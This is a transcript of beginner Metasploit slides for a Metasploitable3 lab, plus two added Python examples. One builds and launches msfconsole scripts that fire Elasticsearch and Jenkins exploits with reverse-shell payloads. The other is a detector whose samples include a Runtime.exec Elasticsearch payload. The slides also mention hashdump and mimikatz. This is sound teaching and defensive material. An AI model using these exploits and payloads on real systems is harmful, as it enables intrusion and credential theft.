Metasploit For Beginners

These slides were presented at a combined Null Open Security / OWASP / G4H community meetup on 21 January 2017. The document is an independent study of using Metasploit against Metasploitable3, a purpose-built vulnerable machine, and covers newer attack surfaces on it such as the Elasticsearch API and Jenkins servers.

Contents

1. Introduction to Metasploit (why Metasploit?)
2. Demo setup and how to use Metasploitable3
3. Networking with VirtualBox for a personal lab
4. Auxiliary modules (scanners and servers), with a demo of snmp_enum
5. Exploit modules (searching for exploits)
6. Payload types
7. Exploit demo 1: exploit/multi/elasticsearch/script_mvel_rce
8. Exploit demo 2: exploit/multi/http/jenkins_script_console

Metasploit For Beginners

  1. Metasploit for Beginners. Ramnath
  2. Whoami: Ramnath Shenoy • Engineering @ FireEye • https://www.linkedin.com/in/ramnathshenoyk • @Ramnathsk
  3. Metasploit for Beginners, agenda: ● Why Metasploit? ● Demo setup ● Auxiliary module ● Exploit module ● Payloads ● Demo 1 - Elasticsearch exploit ● Demo 2 - Jenkins exploit
  4. Why Metasploit? The problems with standalone, publicly released exploit code: ● Published independently, with no common framework ● Written in different programming languages ● Targeting limited to one specific platform ● No evasion techniques ● No clear documentation ● No common coding style, so the code is difficult to embed or modify
  5. Metasploit Framework. Current stable version is v4.13.x (as of January 2017) • Written in Ruby: https://github.com/rapid7/metasploit-framework.git • Ships with 1610 exploits, 914 auxiliary, 279 post, 471 payloads, 39 encoders and 9 nops • Pre-installed in Kali, which is used in this demo. Also available as a Windows installer (never really tried it!)
  6. Metasploit architecture: ● Libraries: Rex, MSF::Core, MSF::Base ● Interfaces: msfconsole ● Modules: exploits, payloads, auxiliary, encoders, nops, post ● Tools ● Plugins
  7. Visualising an attack. The target's vulnerable software is approached in stages, all driven from msfconsole: Auxiliary, then Exploit, then Payload, then Post. ● Auxiliary: scan and enumerate, rogue servers ● Exploit: remote exploit, local exploit ● Payload: windows/shell, windows/adduser ● Post: enumerate credentials, local exploit suggester
  8. Demo setup! Target: Windows 2008 R2 running Metasploitable3, a machine designed to be vulnerable so that exploits and payloads can be tested against it. Setup instructions: https://github.com/rapid7/metasploitable3 ● Attacker: Kali with Metasploit, 172.28.128.4 ● Victim: Windows 2008 R2 (Metasploitable3), 172.28.128.3 ● Both run in VirtualBox on the same virtual network
  9. msfconsole navigation cheat sheet!
     msfupdate - update the framework
     msfconsole - start Metasploit
     > help - example: help search
     > search - example: search name:pcman type:exploit
     > show - examples: show info, show options, show advanced
     > use - examples: use exploit/..., use auxiliary/..., use payload/...
     > set, unset, setg and unsetg - examples: set payload ..., set EXITFUNC ...
     > back, previous
     Exploit, post and payload specifics:
     > set RHOST - victim IP
     > set RPORT - victim port
     > set LHOST - attacker IP
     > set LPORT - attacker port for a reverse connection, or the victim port for a bind payload
     > set SESSION - the session ID of an earlier attack, used when attempting local privilege escalation
  10. Commands before the demo! • Start PostgreSQL, initialise the Metasploit database and then start msfconsole • Create a workspace in Metasploit to store the enumeration results • Run the nmap scan from msfconsole (db_nmap) so that its results are stored; they are then accessible via "services"
  11. Auxiliary modules - demo • Brute-force access tests against different protocols • Enumerate and gather more information with limited access • Check for misconfigured or default web portals • Set up rogue FTP, HTTP, SMB and IMAP servers
  12. Auxiliary module - "use auxiliary/scanner/snmp/snmp_enum"
  13. Exploit modules. Remote exploits are typically found under exploit/<platform>/<protocol>/<application_or_service>; local exploits under exploit/<platform>/local/<application_or_service>
  14. Payload modules. Bind shell TCP • Successful exploitation opens a new port on the victim that gives shell access; the victim is the listener and the attacker connects to it. Reverse shell TCP • Successful exploitation makes the victim connect back to a listener on the attacker and hand over its shell. In both cases the exploit runs first; which side listens is decided by the payload.
  15. Exploit module - demo: exploit/multi/elasticsearch/script_mvel_rce against Elasticsearch 1.1.1, payload java/shell/reverse_tcp
  16. Exploit module 2. In cases like this the attacker machine also has to act as a server that delivers the exploit or payload, so two more options are needed: SRVHOST and SRVPORT. The Meterpreter payload provides an interactive environment with functionality such as • getsystem, clearev, migrate, hashdump, post modules, upload/download, edit • run portrecorder, load mimikatz
  17. Exploit module - demo 2: exploit/multi/http/jenkins_script_console with payload windows/meterpreter/reverse_tcp
  18. Thanks.
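
The "commands before the demo" and the option cheat sheet above are easy to get wrong under time pressure, so here is an added example (not part of the slides) that turns them into an msfconsole resource script, which `msfconsole -r <file>` replays one command per line. It encodes the rule from the payload slide: RHOST/RPORT always point at the victim, a reverse payload needs LHOST/LPORT for the attacker's listener, a bind payload only needs LPORT on the victim. The IP addresses are the demo values; the service ports (9200 for Elasticsearch, 8484 for Jenkins), TARGETURI, the workspace name and the file name are assumptions and should be confirmed against your own db_nmap output. Run `msfdb init` once beforehand so the PostgreSQL-backed database exists.

```python
"""Generate an msfconsole resource script for the Metasploitable3 demos.

Added example, not from the slides. Addresses are the demo values; the
service ports, TARGETURI, workspace name and file name are assumptions.
"""
import subprocess
from dataclasses import dataclass, field

ATTACKER = "172.28.128.4"  # Kali/Metasploit box from the demo setup slide
VICTIM = "172.28.128.3"    # Metasploitable3, Windows 2008 R2


@dataclass
class Demo:
    exploit: str
    payload: str
    rport: int                                  # victim port the exploit talks to
    extra: dict = field(default_factory=dict)   # exploit-specific options


def payload_options(payload, attacker, lport):
    """Handler options implied by the payload name.

    reverse_*: the victim connects back, so LHOST/LPORT is the attacker's listener.
    bind_*:    the payload listens on the victim, so only LPORT (victim side) is set
               and msfconsole connects to RHOST:LPORT once the exploit has fired.
    """
    if "reverse" in payload:
        return {"LHOST": attacker, "LPORT": lport}
    if "bind" in payload:
        return {"LPORT": lport}
    raise ValueError(f"cannot tell bind from reverse in payload name: {payload}")


def resource_script(demo, attacker=ATTACKER, victim=VICTIM, lport=4444, workspace="m3"):
    """Return the msfconsole commands for one demo, one per line."""
    lines = [
        f"workspace -a {workspace}",               # keep this target's enumeration separate
        f"db_nmap -sV -p {demo.rport} {victim}",   # scan results land in the db
        f"services -p {demo.rport} {victim}",      # and are visible via 'services'
        f"use {demo.exploit}",
        f"set RHOST {victim}",
        f"set RPORT {demo.rport}",
        f"set payload {demo.payload}",             # select the payload before its options
    ]
    options = {**payload_options(demo.payload, attacker, lport), **demo.extra}
    lines += [f"set {name} {value}" for name, value in options.items()]
    lines.append("exploit -j")                     # run as a job so the console stays usable
    return "\n".join(lines) + "\n"


# The two demos from the slides. Ports are assumed Metasploitable3 defaults.
# jenkins_script_console serves the payload from the attacker, hence SRVHOST/SRVPORT;
# TARGETURI "/" is an assumption, confirm the Jenkins path from enumeration.
ELASTICSEARCH = Demo("exploit/multi/elasticsearch/script_mvel_rce",
                     "java/shell/reverse_tcp", 9200)
JENKINS = Demo("exploit/multi/http/jenkins_script_console",
               "windows/meterpreter/reverse_tcp", 8484,
               {"SRVHOST": ATTACKER, "SRVPORT": 8080, "TARGETURI": "/"})


def run(demo, path="m3.rc"):
    """Write the script and hand it to msfconsole (needs Metasploit installed)."""
    with open(path, "w") as fh:
        fh.write(resource_script(demo))
    subprocess.run(["msfconsole", "-q", "-r", path], check=False)


if __name__ == "__main__":
    run(ELASTICSEARCH)
```

Swapping `java/shell/reverse_tcp` for a `bind_tcp` payload changes only the generated `set` lines: LHOST disappears and LPORT now names the port the payload will open on the victim, which is exactly the distinction the cheat sheet makes.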
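
The two demos also have a defender's side. Below is an added example (not from the slides or from the Metasploit modules) that looks at HTTP requests the way a reverse proxy or packet capture would present them and flags the two techniques the demos use: an Elasticsearch `_search` carrying `script_fields`, which asks the server to evaluate a dynamic script (the MVEL evaluation that script_mvel_rce relies on, possible only while dynamic scripting is enabled, which it was by default before Elasticsearch 1.2.0), and a POST to the Jenkins script console (`/script` or `/scriptText`), which runs Groovy on the master. The request representation, the single optional context-path segment for Jenkins and the sample requests are all constructed for this example.

```python
"""Spot the Elasticsearch dynamic-script and Jenkins script-console techniques.

Added example, not from the slides. Requests and log format are constructed.
"""
import json
import re
from dataclasses import dataclass


@dataclass
class HttpRequest:
    src: str       # client address
    method: str
    path: str      # path plus query string
    body: str = ""


@dataclass
class Finding:
    src: str
    tag: str
    detail: str


# Jenkins script console, optionally under one context-path segment such as /jenkins
SCRIPT_CONSOLE = re.compile(r"^(?:/[^/?]+)?/script(?:Text)?(?:[?].*)?$")


def es_version_vulnerable(banner: str) -> bool:
    """True if the GET / banner reports a release before 1.2.0, where dynamic
    scripting is on by default (the demo target runs 1.1.1)."""
    number = json.loads(banner)["version"]["number"]
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", number)
    if not m:
        raise ValueError(f"unparseable version: {number}")
    return tuple(int(x) for x in m.groups()) < (1, 2, 0)


def es_script_fields(req: HttpRequest):
    """Return the scripts in a _search body's script_fields, [] if none."""
    if not req.path.split("?", 1)[0].endswith("/_search"):
        return []
    try:
        doc = json.loads(req.body or "{}")
    except ValueError:
        return []
    fields = doc.get("script_fields") if isinstance(doc, dict) else None
    if not isinstance(fields, dict):
        return []
    return [spec["script"] for spec in fields.values()
            if isinstance(spec, dict) and isinstance(spec.get("script"), str)]


def analyse(requests):
    """Walk the requests in order and return one Finding per suspicious one."""
    findings = []
    for req in requests:
        for script in es_script_fields(req):
            # reflection into Runtime is command execution, anything else is still a server-side script
            sev = "high" if "Runtime" in script or "forName" in script else "medium"
            findings.append(Finding(req.src, "es-dynamic-script", f"{sev}: {script[:60]}"))
        if SCRIPT_CONSOLE.match(req.path):
            if req.method == "POST":   # POST /script executes the submitted Groovy
                findings.append(Finding(req.src, "jenkins-script-console-exec", req.path))
            else:                      # GET only renders the console page
                findings.append(Finding(req.src, "jenkins-script-console-view", req.path))
    return findings


# Constructed sample: one benign search, one dynamic-script search, a console
# page view, a console execution and an unrelated Jenkins API call.
SAMPLE = [
    HttpRequest("172.28.128.10", "GET", "/_search?pretty", '{"query":{"match_all":{}}}'),
    HttpRequest("172.28.128.4", "POST", "/_search?pretty", json.dumps({
        "size": 1, "query": {"match_all": {}},
        "script_fields": {"cmd": {"script":
            'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("calc.exe")'}}})),
    HttpRequest("172.28.128.10", "GET", "/jenkins/script"),
    HttpRequest("172.28.128.4", "POST", "/jenkins/script", "script=println+%22hi%22&json=%7B%7D"),
    HttpRequest("172.28.128.10", "GET", "/jenkins/job/build/lastBuild/api/json"),
]

if __name__ == "__main__":
    for f in analyse(SAMPLE):
        print(f"{f.src:15} {f.tag:30} {f.detail}")
```

Because the Elasticsearch API has no authentication in the version shown, the fix is configuration rather than detection: `script.disable_dynamic: true` (or upgrading past 1.2.0) and not exposing port 9200 beyond the hosts that need it. For Jenkins, anyone with Overall/RunScripts can do what the exploit module does, so the detection is only useful alongside tight control of who holds that permission.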
